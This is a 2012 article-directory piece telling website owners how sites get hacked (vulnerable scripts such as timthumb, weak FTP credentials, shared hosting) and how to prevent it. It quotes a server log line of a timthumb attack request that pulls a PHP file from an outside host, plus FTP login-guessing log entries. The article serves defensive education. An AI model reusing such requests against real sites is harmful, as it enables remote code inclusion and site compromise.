Article Side

Online Article Directory!

Hello Guest! Login or Register to submit articles!

So Your Website Has Been Hacked?

By Alan Ogden Subscribe to RSS | May 24th 2012 | Views:
loading
 
  



A common question we receive is 'Why did I get hacked? We haven't done anything…'. The easy answer is, it's not you or your site, it's most likely an random attack by an automated program or robot. There are 'high score' sites where people list their defacements and conquests. It's a numbers game and it does not matter if it's a small site with photos or a business lifeline. HOW DID MY SITE GET HACKED? This question is harder to answer, but in these days of dynamic sites it is usually the website itself that is the culprit. The advent of free, open source scripts created by third parties specifically aimed at 'non-techies' has created a vast swathe of content creators who don't know how their websites work. This is not necessarily a bad thing, however it does lead to easier targets for hackers.

COMMON ENTRY POINTSWeb Scripts - scripts such as WordPress, Joomla, Drupal. WordPress for example had the recently publicised timthumb vulnerability. As a widely used image publishing and resizing tool, it eventually turned out that a simple coding issue allowed an attacker to gain a 'web shell' inside wordpress sites. This sparked a mass series of automated attacks looking for 'timthumb'. It's still going on today. 77.65.2.180 - - [09/May/2012:11:27:38 +0100] "GET //wp-content/themes/mimbopro/scripts/timthumb.php?src=http%3a%2f%2fpicasa.combos.aaa.org/byroe.php HTTP/1.1" 404 1276 "-" "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)" File Security - most hosting solutions allow file access via FTP. This is protected by a single username and password that, if compromised, would allow an attacker to upload anything to your site. FTP is an old protocol and transmits the username and password in plain text. It is trivial, under the right conditions, to gain access to these details. The details can also be guessed if they are insecure. May 9 10:41:11 server ftpd[24517]: (188.165.203.19[188.165.203.19]) - USER admin: no such user found from 188.165.203.19 [188.165.203.19] to 188.65.183.161:21 May 9 10:41:11 server ftpd[24518]: (188.165.203.19[188.165.203.19]) - USER webmaster: no such user found from 188.165.203.19 [188.165.203.19] to 188.65.183.161:21 Other Websites - The majority of people use shared hosting as it reduces costs however it is possible to be 'backdoored' by another site on the same platform depending on server conditions and permission setup. WHAT CAN I DO TO PREVENT GETTING HACKED? --Easy To Do Keep your scripts up to date. Make it a weekly occurrence to check for any updates. Most scripts have automated notifiers in the admin section that will prompt you to update. Add additional protection to your sites rather than relying on the security features of the third party creating your site. For example, in the administration section of your site add a an additional user and password prompt.

Do not use insecure usernames and passwords for file access, and ask your webhost if FTP over SSL, or FTP over SSH (SFTP) is available. Replacing l3tt3r5 with numb3r5 is not an effective security measure. Not really a prevention, but BACKUP. Don't rely on anyone doing this but you. Backup. Backup. Did I say it enough times? Back UP. --Harder to do or not cost effective Lock down permissions on your site to prevent file changes and only allow uploading when adding content. Some hosts have a 'lock this site' option that will prevent anyone writing to the website be it your FTP user, or anything uploaded to the site. This is only effective in certain situations where temporary files are not needed etc. Move to virtual or dedicated hosting and apply tools such as an application firewall or systems to track file changes such as Tripwire.

Alan Ogden - About Author:
Alan Ogden is United Kingdom Author. He is working with technology firm , he written so many articles on propular topics like website hacked and site hacked and much more. He has applied his knowledge and understanding to a wide variety of technology services.

Share on Facebook Tweet It Stumbleupon this post This post is delicious !

Article Source:
http://www.articleside.com/internet-business-articles/so-your-website-has-been-hacked.htm

Related Internet Business Articles Subscribe to RSS

Increase the traffic with Social Bookmarking on your site
Published by Dany on March 5th 2012 | Internet Business
Social bookmarking is interesting way to store or to organize their favorite web pages or web links ...
 
Why SEO Consultants are Needed in Businesses Today
Published by Paul Smith on August 23rd 2012 | Internet Business
When you talk about companies and businesses today, most of them have their own SEO Consultants who ...
 
Why SEO Consultants are Needed in Businesses Today
Published by Paul Smith on August 23rd 2012 | Internet Business
When you talk about companies and businesses today, most of them have their own SEO Consultants who ...
 
Internet marketing for startup
Published by Nichole Barker on August 22nd 2012 | Internet Business
For business that is potentially struggling in a startup stage every dollar counts....
 
Internet Marketing for Start Up
Published by Blliss Mark on August 21st 2012 | Internet Business
Internet startup marketing for a start up company is absolutely crucial in order to make an impact w...
 
Internet Marketing for Start Up
Published by Blliss Mark on August 21st 2012 | Internet Business
Internet startup marketing for a start up company is absolutely crucial in order to make an impact w...
 
Select Affordable SEO Packages for improve brand image
Published by Ali Conner on August 18th 2012 | Internet Business
SEO is the most useful and effective technique for your online business to get top results in search...